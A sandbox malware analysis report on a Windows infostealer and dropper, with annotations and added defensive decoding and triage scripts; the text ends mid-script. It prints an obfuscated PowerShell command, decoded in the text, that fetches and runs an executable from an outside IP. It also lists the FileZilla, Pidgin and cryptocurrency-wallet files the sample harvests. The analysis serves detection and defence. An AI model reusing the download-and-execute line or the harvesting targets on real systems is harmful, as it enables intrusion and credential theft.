Summary | ZeroBOX

aXSz3.exe

Antivirus
Category | Machine | Started | Completed
--- | --- | --- | ---
FILE | s1_win7_x6402 | April 12, 2021, 10:42 a.m. | April 12, 2021, 10:46 a.m.

Size: 92.5KB
Type: PE32 executable (console) Intel 80386, for MS Windows
MD5: 6f504e4d2887038775a8636d246f38a1
SHA256: 05d38ac5460418b0aa813fc8c582ee5be42be192de10d188332901157c54287c
CRC32: 42F32246
ssdeep: 1536:H7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfiwRwOr:b7DhdC6kzWypvaQ0FxyNTBfiOf
Yara
  • win_files_operation - Affect private profile
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsConsole - (no description)

Name | Response | Post-Analysis Lookup
--- | --- | ---
prtboss.com | 111.90.156.90 |

IP Address | Status | Action
--- | --- | ---
111.90.156.90 | Active | Moloch
164.124.101.2 | Active | Moloch
172.217.25.14 | Active | Moloch
23.92.213.108 | Active | Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameA | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0

The host name is read seven times (six wide-character calls, one ANSI call); together with the MachineGuid read further down this is the usual raw material for a per-victim identifier.

Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
IsDebuggerPresent | | | 0 | 0
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
WriteConsoleW | buffer: The specified path is invalid. / console_handle: 0x000000000000000b | 1 | 1 | 0
WriteConsoleW | buffer: 'sleep' is not recognized as an internal or external command, operable program or batch file. / console_handle: 0x000000000000000b | 1 | 1 | 0
WriteConsoleW | buffer: Missing operator. / console_handle: 0x000000000000000b | 1 | 1 | 0
WriteConsoleW | buffer: Missing operator. / console_handle: 0x000000000000000b | 1 | 1 | 0
WriteConsoleW | buffer: Missing operator. / console_handle: 0x000000000000000b | 1 | 1 | 0
WriteConsoleW | buffer: Missing operator. / console_handle: 0x000000000000000b | 1 | 1 | 0
WriteConsoleW | buffer: 1 file(s) copied. / console_handle: 0x0000000000000007 | 1 | 1 | 0
WriteConsoleW | buffer: The operation completed successfully. / console_handle: 0x0000000000000007 | 1 | 1 | 0
WriteConsoleW | buffer: The operation completed successfully. / console_handle: 0x0000000000000007 | 1 | 1 | 0

These are cmd.exe's own messages while it runs the dropped .bat files: `sleep` is not a Windows command, so the batch's delay call fails; "Missing operator." is what `set /a` prints for a malformed arithmetic expression (four times); "1 file(s) copied." comes from `copy`; and "The operation completed successfully." is reg.exe's success message, printed once for each of the two REG ADD commands listed later in this report. "The specified path is invalid." is the Win32 ERROR_BAD_PATHNAME text; the likeliest trigger is the Start Menu .lnk path below, which carries a literal, unexpanded %ProgramData% under the Temp directory. The error lines go to console handle 0xb and the success lines to 0x7, consistent with stderr and stdout being separate handles.
40 CryptExportKey calls, listed in order and collapsed by key handle. Every call has blob_type: 6, flags: 0, crypto_export_handle: 0x0000000000000000 and buffer: <INVALID POINTER>.

Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
CryptExportKey (1 call) | crypto_handle: 0x00000000001d1fb0 | 1 | 1 | 0
CryptExportKey (3 calls) | crypto_handle: 0x0000000002b83450 | 1 | 1 | 0
CryptExportKey (2 calls) | crypto_handle: 0x0000000002b98360 | 1 | 1 | 0
CryptExportKey (4 calls) | crypto_handle: 0x0000000002b98440 | 1 | 1 | 0
CryptExportKey (3 calls) | crypto_handle: 0x0000000002b987c0 | 1 | 1 | 0
CryptExportKey (3 calls) | crypto_handle: 0x0000000002b983d0 | 1 | 1 | 0
CryptExportKey (8 calls) | crypto_handle: 0x0000000002b98c90 | 1 | 1 | 0
CryptExportKey (3 calls) | crypto_handle: 0x0000000002b98d70 | 1 | 1 | 0
CryptExportKey (2 calls) | crypto_handle: 0x0000000002b98de0 | 1 | 1 | 0
CryptExportKey (2 calls) | crypto_handle: 0x0000000002b98e50 | 1 | 1 | 0
CryptExportKey (3 calls) | crypto_handle: 0x0000000002b98de0 | 1 | 1 | 0
CryptExportKey (2 calls) | crypto_handle: 0x00000000001b7180 | 1 | 1 | 0
CryptExportKey (2 calls) | crypto_handle: 0x00000000001b6c40 | 1 | 1 | 0
CryptExportKey (2 calls) | crypto_handle: 0x0000000002bc0aa0 | 1 | 1 | 0

blob_type 6 is PUBLICKEYBLOB and a zero crypto_export_handle means the blob is not wrapped with an exchange key, so each call exports a public key in the clear. `<INVALID POINTER>` is how the monitor renders a pbData it could not read, which for CryptExportKey is most likely the NULL-buffer length query that precedes the real export; no exported key material is therefore visible in this report.
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
GlobalMemoryStatusEx | | 1 | 1 | 0

section: .code
packer: PureBasic 4.x -> Neil Hodgson
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://23.92.213.108/po/tai1.exe
suspicious_features: POST method with no referer header
suspicious_request: POST http://prtboss.com/collect.php
request: GET http://23.92.213.108/po/tai1.exe
request: POST http://prtboss.com/collect.php
request: POST http://prtboss.com/collect.php

The MachineGuid value read above is commonly used as a stable per-host identifier; the two POSTs to /collect.php are the only outbound traffic to the resolved domain and are plain HTTP (no Suricata TLS entries).
50 memory calls, listed in order and collapsed where consecutive entries are identical. Every call has process_identifier: 4408, process_handle: 0xffffffffffffffff (the current-process pseudo-handle), protection: 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass: 0, stack_pivoted: 0, Status 1, Return 0 and Repeated 0. NtProtectVirtualMemory entries have length: 4096.

Time & API | Calls | base_address | region_size / length | allocation_type | heap_dep_bypass
--- | --- | --- | --- | --- | ---
NtAllocateVirtualMemory | 1 | 0x0000000002990000 | 2031616 | 8192 (MEM_RESERVE) | 0
NtAllocateVirtualMemory | 1 | 0x0000000002b00000 | 8192 | 4096 (MEM_COMMIT) | 1
NtProtectVirtualMemory | 1 | 0x000007fef2451000 | 4096 | | 0
NtProtectVirtualMemory | 2 | 0x000007fef26ce000 | 4096 | | 0
NtProtectVirtualMemory | 8 | 0x000007fef26cf000 | 4096 | | 0
NtProtectVirtualMemory | 5 | 0x000007fef26d0000 | 4096 | | 0
NtProtectVirtualMemory | 4 | 0x000007fef26d1000 | 4096 | | 0
NtProtectVirtualMemory | 1 | 0x000007fef26ce000 | 4096 | | 0
NtAllocateVirtualMemory | 1 | 0x000007ff00022000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007fffff10000 | 589824 | 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) | 0
NtAllocateVirtualMemory | 2 | 0x000007fffff10000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007fffff00000 | 65536 | 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) | 0
NtAllocateVirtualMemory | 1 | 0x000007fffff00000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000da000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00012000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x0000000002b02000 | 8192 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x0000000002b04000 | 12288 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000ea000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00023000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00024000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00112000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000ed000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000db000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000d2000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00025000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00160000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00013000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00026000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00113000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000dc000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff000d3000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff0001a000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x000007ff00027000 | 4096 | 4096 (MEM_COMMIT) | 1
NtAllocateVirtualMemory | 1 | 0x0000000002b07000 | 16384 | 4096 (MEM_COMMIT) | 1

Caveat before reading these as injection: all of them act on process 4408's own address space, and the addresses (0x000007fe..., 0x000007ff...) lie in the 64-bit user range, so 4408 is a 64-bit process and cannot be the PE32 sample itself. Given that the batch file is launched through `\sysnative\cmd` (the alias by which a WoW64 process reaches the native 64-bit System32), the 64-bit PowerShell it spawns is the likely origin, and a .NET runtime routinely commits RWX pages for JIT output and re-protects pages of loaded images. heap_dep_bypass, stack_dep_bypass and stack_pivoted are the monitor's exploit-heuristic flags; only heap_dep_bypass is set here, and only on the MEM_COMMIT calls. On their own these entries are weak evidence; weigh them together with the process tree and the NtResumeThread entry further down.
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
file C:\Users\test22\AppData\Local\Temp\FE6D.tmp\FE6E.tmp\FE6F.bat
file C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline PowERsHELl -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvADIAMwAuADkAMgAuADIAMQAzAC4AMQAwADgALwBwAG8ALwB0AGEAaQAxAC4AZQB4AGUAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwARAB5AEUAcQBPAGQAcABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUATgB2ADoAdABlAG0AcABcAEQAeQBFAHEATwBkAHAAbQAuAGUAeABlAB0g
cmdline cMd.E"x"e 2ubishdata2/R = PowERsHELl -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvADIAMwAuADkAMgAuADIAMQAzAC4AMQAwADgALwBwAG8ALwB0AGEAaQAxAC4AZQB4AGUAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwARAB5AEUAcQBPAGQAcABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUATgB2ADoAdABlAG0AcABcAEQAeQBFAHEATwBkAHAAbQAuAGUAeABlAB0g
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe
file C:\Users\test22\AppData\Local\Temp\DyEqOdpm.exe

Notes on the two command lines. In the PowerShell invocation, -w 1 is -WindowStyle Hidden and /e is -EncodedCommand, whose argument is base64 over UTF-16LE text. Decoded, the payload is:

 (NEw-objEct “`N`e`T`.`W`e`B`C`l`i`e`N`T”).DownLoAdfIlE( ”http://23.92.213.108/po/tai1.exe” , ”$ENv:temp\DyEqOdpm.exe” ) ; stARt ”$ENv:temp\DyEqOdpm.exe”

The curly quotes are accepted by the PowerShell tokenizer as ordinary double quotes, the backticks in front of letters that are not escape sequences are no-ops that the parser drops (so “`N`e`T`.`W`e`B`C`l`i`e`N`T” is Net.WebClient), and the mixed case is cosmetic. The command therefore downloads http://23.92.213.108/po/tai1.exe to %TEMP%\DyEqOdpm.exe and starts it, which is exactly the GET request and the dropped file recorded elsewhere in this report. In the cmd.exe line, cMd.E"x"e is the image name with quote characters inserted (cmd.exe discards them before resolving the program), /R is an alias for /C, and the text glued to the switch is ignored by cmd's switch parser; the sandbox run confirms the line executed, since powershell.exe appears as the parent of DyEqOdpm.exe below.
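The script below is an added worked example, not ZeroBOX code and not the sample's own code. It decodes the -EncodedCommand argument copied from the cmdline entry above, undoes the tick and smart-quote obfuscation, and pulls out the URL, drop path and the download/execute primitives. The list of letters that form real escape sequences in Windows PowerShell 5.x (the version on the Win7 analysis machine) is an assumption of this script, as are the regexes and the field names.

```python
"""Decode and de-obfuscate a PowerShell -EncodedCommand payload.

Added example (not ZeroBOX code). ENCODED is copied verbatim from the
cmdline entry in the sandbox report; everything else is this script's
own assumption.
"""
import base64
import re

ENCODED = (
    "IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAA"
    "aQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwADoALwAvADIA"
    "MwAuADkAMgAuADIAMQAzAC4AMQAwADgALwBwAG8ALwB0AGEAaQAxAC4AZQB4AGUAHSAgACwAIAAdICQARQBOAHYA"
    "OgB0AGUAbQBwAFwARAB5AEUAcQBPAGQAcABtAC4AZQB4AGUAHSAgACkAIAA7ACAAcwB0AEEAUgB0ACAAHSAkAEUA"
    "TgB2ADoAdABlAG0AcABcAEQAeQBFAHEATwBkAHAAbQAuAGUAeABlAB0g"
)

# Assumption: in Windows PowerShell 5.x these lowercase letters form real
# escape sequences inside double-quoted strings (`0 `a `b `f `n `r `t `v).
# A backtick before any other character is a no-op and exists only to break
# string matching, so it can be dropped without changing what ran.
_REAL_ESCAPES = set("0abfnrtv")

# The PowerShell tokenizer accepts curly quotes as quote characters.
_SMART_QUOTES = {"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'}


def decode_encoded_command(b64: str) -> str:
    """-e / -EncodedCommand carries base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def deobfuscate(script: str) -> str:
    """Normalise quotes, drop no-op backticks, collapse whitespace."""
    for smart, plain in _SMART_QUOTES.items():
        script = script.replace(smart, plain)
    out, i = [], 0
    while i < len(script):
        ch = script[i]
        if ch == "`" and i + 1 < len(script) and script[i + 1] not in _REAL_ESCAPES:
            i += 1          # skip the backtick, keep the escaped character
            continue
        out.append(ch)
        i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip()


def extract_iocs(script: str) -> dict:
    """URLs, %TEMP% drop paths and the download/execute primitives used."""
    urls = re.findall(r"https?://[^\s\"'(),;]+", script)
    paths = re.findall(r"\$env:temp\\[^\s\"']+", script, flags=re.IGNORECASE)
    lowered = script.lower()
    methods = [m for m in ("net.webclient", "downloadfile", "start") if m in lowered]
    return {"urls": urls, "drop_paths": paths, "methods": methods}


if __name__ == "__main__":
    plain = deobfuscate(decode_encoded_command(ENCODED))
    print(plain)
    print(extract_iocs(plain))
```

The backtick rule is deliberately version-specific: PowerShell 6 added `e and `u as escape sequences, so a script targeting a modern host would need those letters added to the set, and a decoder that strips every backtick would mangle a genuine `n inside the payload.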
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
GetAdaptersAddresses | flags: 15, family: 0 | | 111 | 0

Return 111 is ERROR_BUFFER_OVERFLOW, the normal first result of a size query; flags 15 is GAA_FLAG_SKIP_UNICAST|SKIP_ANYCAST|SKIP_MULTICAST|SKIP_DNS_SERVER and family 0 is AF_UNSPEC, so the call enumerates adapters without their address lists, which is the cheap way to collect MAC addresses.

Section | virtual_address | virtual_size | size_of_data | entropy
--- | --- | --- | --- | ---
.rdata | 0x00013000 | 0x000033a5 | 0x00003400 | 7.1118
.rsrc | 0x00019000 | 0x00001324 | 0x00001400 | 7.6173
description: A section with a high entropy has been found
Data received: binary response body (the page dumps the raw bytes as text; omitted here). The bytes at the start of the dump, U‹ìƒì, are 55 8B EC 83 EC, the push ebp / mov ebp,esp / sub esp prologue of 32-bit x86 code, consistent with a chunk of the PE fetched from /po/tai1.exe.
Data sent: GET /po/tai1.exe HTTP/1.1 / Host: 23.92.213.108 / Connection: Keep-Alive
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
LookupPrivilegeValueW | system_name: (empty), privilege_name: SeDebugPrivilege | 1 | 1 | 0

Looking up the LUID of SeDebugPrivilege is the first half of enabling it with AdjustTokenPrivileges; the adjust call itself is not shown in this report.
Static capability rules matched against the binary (string and import matches, so they describe what the code contains, not what was observed running):

Rule | Description
--- | ---
inject_thread | Code injection with CreateRemoteThread in a remote process
create_service | Create a windows service
network_udp_sock | Communications over UDP network
network_tcp_listen | Listen for incoming communication
network_p2p_win | Communications over P2P network
network_http | Communications over HTTP
network_dropper | File downloader/dropper
network_ftp | Communications over FTP
network_tcp_socket | Communications over RAW socket
network_dns | Communications use DNS
network_dga | Communication using dga
escalate_priv | Escalate privileges
screenshot | Take screenshot
keylogger | Run a keylogger
cred_local | Steal credential
sniff_audio | Record Audio
migrate_apc | APC queue tasks migration
spreading_share | Malware can spread east-west using share drive
win_mutex | Create or check mutex
win_registry | Affect system registries
win_token | Affect system token
win_private_profile | Affect private profile
win_files_operation | Affect private profile
Str_Win32_Winsock2_Library | Match Winsock 2 API library declaration
Str_Win32_Wininet_Library | Match Windows Inet API library declaration
Str_Win32_Internet_API | Match Windows Inet API call
Str_Win32_Http_API | Match Windows Http API call
DebuggerCheck__GlobalFlags | (no description)
DebuggerCheck__QueryInfo | (no description)
DebuggerCheck__RemoteAPI | (no description)
DebuggerHiding__Thread | (no description)
DebuggerHiding__Active | (no description)
DebuggerException__ConsoleCtrl | (no description)
DebuggerException__SetConsoleCtrl | (no description)
ThreadControl__Context | (no description)
SEH__vectored | (no description)
Check_Dlls | (no description)
anti_dbg | Checks if being debugged
antisb_threatExpert | Anti-Sandbox checks for ThreatExpert
disable_dep | Bypass DEP
win_hook | Affect hook table
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
NtTerminateProcess | status_code: 0xffffffff, process_identifier: 7748, process_handle: 0x000000d8 | | 0 | 0
NtTerminateProcess | status_code: 0xffffffff, process_identifier: 7748, process_handle: 0x000000d8 | | 3221225738 | 0
NtTerminateProcess | status_code: 0xffffffff, process_identifier: 8324, process_handle: 0x000000d8 | | 0 | 0
NtTerminateProcess | status_code: 0xffffffff, process_identifier: 8324, process_handle: 0x000000d8 | | 3221225738 | 0

status_code 0xffffffff is the exit status (-1) the caller passes. Return 3221225738 is 0xC000010A, STATUS_PROCESS_IS_TERMINATING: the second call on each handle arrives after the first has already succeeded.
cmdline "C:\Windows\sysnative\cmd" /c "C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat C:\Users\test22\AppData\Local\Temp\aXSz3.exe"
cmdline "C:\Windows\sysnative\cmd" /c "C:\Users\test22\AppData\Local\Temp\FE6D.tmp\FE6E.tmp\FE6F.bat C:\Users\test22\AppData\Local\Temp\aXSz3.exe"
cmdline REG ADD HKCU\Software\Classes\CLSID\{fIVyUCyCgmYerDKhxywzCYHpaydQNEHJFGMJlsvEUxVbJBYZdTsUZShIZHHQYTVJJZjgDNeeOnJQOdvxQbp00e52-a214-4aGfgWBQtvSqxOkOREyJyBKuXxCVZOBjjnsGfdicRWTGVQHmjYPtuuQkXOxZYqUvnYGCdbzhxPoRzVpxIvPgNZuuByZUC-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
cmdline REG ADD HKCU\Software\Classes\CLSID\{fIVyUCyCgmYerDKhxywzCYHpaydQNEHJFGMJlsvEUxVbJBYZdTsUZShIZHHQYTVJJZjgDNeeOnJQOdvxQbp00e52-a214-4aGfgWBQtvSqxOkOREyJyBKuXxCVZOBjjnsGfdicRWTGVQHmjYPtuuQkXOxZYqUvnYGCdbzhxPoRzVpxIvPgNZuuByZUC-8fba-4357bb0072ec} /f
host 172.217.25.14
host 23.92.213.108
file C:\wallet.dat
file C:\Users\test22\AppData\Roaming\Electrum\wallets
file C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat
file C:\Users\test22\AppData\Local\Temp\42.tmp
file C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp

Two nested .tmp directories each hold one batch file, and each batch is run by the native 64-bit cmd.exe (reached through the sysnative alias because the sample is a 32-bit process) with the sample's own path as its first argument. The REG ADD pair writes a CLSID under the user-writable HKCU\Software\Classes hive whose InProcServer32 default value names C:\IDontExist.dll; the "CLSID" is not a well-formed GUID, so no COM activation would resolve it, and both commands succeed (the two "The operation completed successfully." console lines above). The report does not show what the batch does with the key afterwards. wallet.dat and the Electrum wallets directory are cryptocurrency wallet locations.
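As an added example (not ZeroBOX code and not the sample's), the script below triages process command lines for the launch-chain traits visible in this report: the quote-split image name, the junk glued to cmd's /R switch, the sysnative path, the PowerShell -ExecutionPolicy Bypass / hidden window / encoded-command trio, and REG ADD writes under HKCU\Software\Classes\CLSID. The five command lines are copied from the report with the CLSID string and the base64 payload shortened; the tag names and regexes are this script's own assumptions.

```python
"""Triage Windows process command lines for the launch chain in this report.

Added example: not ZeroBOX code and not the sample's code. SAMPLE_CMDLINES
is constructed from the report (CLSID and encoded payload shortened); the
tags and heuristics are this script's own assumptions.
"""
import base64
import re

SAMPLE_CMDLINES = [
    r'"C:\Windows\sysnative\cmd" /c "C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat C:\Users\test22\AppData\Local\Temp\aXSz3.exe"',
    r'cMd.E"x"e 2ubishdata2/R = PowERsHELl -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0A',
    r'PowERsHELl -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0A',
    r'REG ADD HKCU\Software\Classes\CLSID\{fIVyUC-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f',
    r'REG ADD HKCU\Software\Classes\CLSID\{fIVyUC-8fba-4357bb0072ec} /f',
]

# -e / -ec / -enc / -EncodedCommand, with either dash or slash prefix.
_ENC = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def split_image(cmdline: str):
    """Return (raw_first_token, cleaned_token, image_basename).

    Mimics cmd.exe: a leading quoted path is taken whole; otherwise the first
    whitespace-delimited token is used with every '"' and '^' discarded, which
    is how cMd.E"x"e resolves to cmd.exe.
    """
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        raw = s[: end + 1] if end > 0 else s
        token = raw.strip('"')
    else:
        raw = s.split(None, 1)[0] if s else ""
        token = raw.replace('"', "").replace("^", "")
    base = token.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return raw, token, base[:-4] if base.endswith(".exe") else base


def triage(cmdlines):
    results = []
    for line in cmdlines:
        raw, token, image = split_image(line)
        norm = line.replace('"', "").lower()  # quotes never matter for these checks
        tags, decoded = [], None
        if not line.lstrip().startswith('"') and ('"' in raw or "^" in raw):
            tags.append("image_quote_obfuscation")
        if image == "cmd":
            if "\\sysnative\\" in token.lower():
                tags.append("sysnative_escape")  # 32-bit process starting 64-bit cmd.exe
            if re.search(r'[^\s"]/[rc](?:\s|$)', line, re.I):
                tags.append("cmd_switch_glued")  # junk glued to /R (alias of /C)
        if "powershell" in norm:
            if re.search(r"[-/]ex\w*\s+bypass", norm):
                tags.append("executionpolicy_bypass")
            if re.search(r"[-/]w(?:indowstyle)?\s+(?:1|hidden)\b", norm):
                tags.append("hidden_window")
            m = _ENC.search(line)
            if m:
                try:  # the payload must be valid base64 over UTF-16LE text
                    decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
                    tags.append("powershell_encoded_command")
                except (ValueError, UnicodeDecodeError):
                    tags.append("powershell_encoded_command_undecodable")
        if image == "reg" and " add " in norm and "hkcu\\software\\classes\\clsid\\" in norm:
            tags.append("hkcu_clsid_write")  # user-writable COM registration location
            if "\\inprocserver32" in norm:
                tags.append("hkcu_clsid_inprocserver32")
        results.append({"cmdline": line, "image": image, "tags": tags, "decoded": decoded})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_CMDLINES):
        print(r["image"], r["tags"], repr(r["decoded"]))
```

Matching on the cleaned image name rather than the raw token is the point of split_image: a rule keyed on the literal string `cmd.exe` never sees cMd.E"x"e, but the file system does.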
Time & API | Arguments | Status | Return | Repeated
--- | --- | --- | --- | ---
RegSetValueExA | key_handle: 0x00000230, regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable, regkey_r: ProxyEnable, reg_type: 4 (REG_DWORD), value: 0 | 1 | 0 | 0

Writing ProxyEnable = 0 turns off the user's WinINet proxy setting, so the sample's HTTP requests go direct instead of through any configured proxy.
file C:\Users\Default\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\Default User\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\Default\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\Public\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\Public\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\Default User\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\All Users\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\All Users\AppData\Roaming\FileZilla\recentservers.xml
file C:\Users\All Users\AppData\Roaming\.purple\accounts.xml
file C:\Users\Default User\AppData\Roaming\.purple\accounts.xml
file C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file C:\Users\Default\AppData\Roaming\.purple\accounts.xml
file C:\Users\Public\AppData\Roaming\.purple\accounts.xml

FileZilla's sitemanager.xml and recentservers.xml hold saved FTP servers and credentials, and .purple\accounts.xml holds Pidgin account passwords. The same two stores are probed under Default, Default User, Public and All Users as well as the logged-on user test22, so the stealer walks every directory under C:\Users rather than reading only the current profile; probing the non-interactive profiles is itself a usable detection signal.
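The script below is an added example (not ZeroBOX code and not the sample's). It takes the file paths recorded in this report, maps each to the credential store or wallet it belongs to, and flags a category as a profile sweep when it is probed under several user profiles, which is the pattern the FileZilla and Pidgin entries above show. The category map, the label names and the sweep threshold are this script's own assumptions.

```python
"""Classify credential-store and wallet paths touched by a process.

Added example (not ZeroBOX code). SAMPLE_FILE_EVENTS is constructed from
the file entries in the sandbox report; the categories, labels and the
profile-sweep threshold are this script's own assumptions.
"""
import re
from collections import defaultdict

SAMPLE_FILE_EVENTS = [
    r"C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State",
    r"C:\wallet.dat",
    r"C:\Users\test22\AppData\Roaming\Electrum\wallets",
    r"C:\Users\Default\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\Default User\AppData\Roaming\FileZilla\recentservers.xml",
    r"C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml",
    r"C:\Users\Default\AppData\Roaming\FileZilla\recentservers.xml",
    r"C:\Users\Public\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\Public\AppData\Roaming\FileZilla\recentservers.xml",
    r"C:\Users\Default User\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\All Users\AppData\Roaming\FileZilla\sitemanager.xml",
    r"C:\Users\All Users\AppData\Roaming\FileZilla\recentservers.xml",
    r"C:\Users\All Users\AppData\Roaming\.purple\accounts.xml",
    r"C:\Users\Default User\AppData\Roaming\.purple\accounts.xml",
    r"C:\Users\test22\AppData\Roaming\.purple\accounts.xml",
    r"C:\Users\Default\AppData\Roaming\.purple\accounts.xml",
    r"C:\Users\Public\AppData\Roaming\.purple\accounts.xml",
    r"C:\Users\test22\AppData\Local\Temp\42.tmp\43.tmp\44.bat",  # not a credential store
]

# Category label -> regex on the path tail (labels are this script's own).
CATEGORIES = {
    "filezilla_saved_servers": re.compile(r"\\FileZilla\\(sitemanager|recentservers)\.xml$", re.I),
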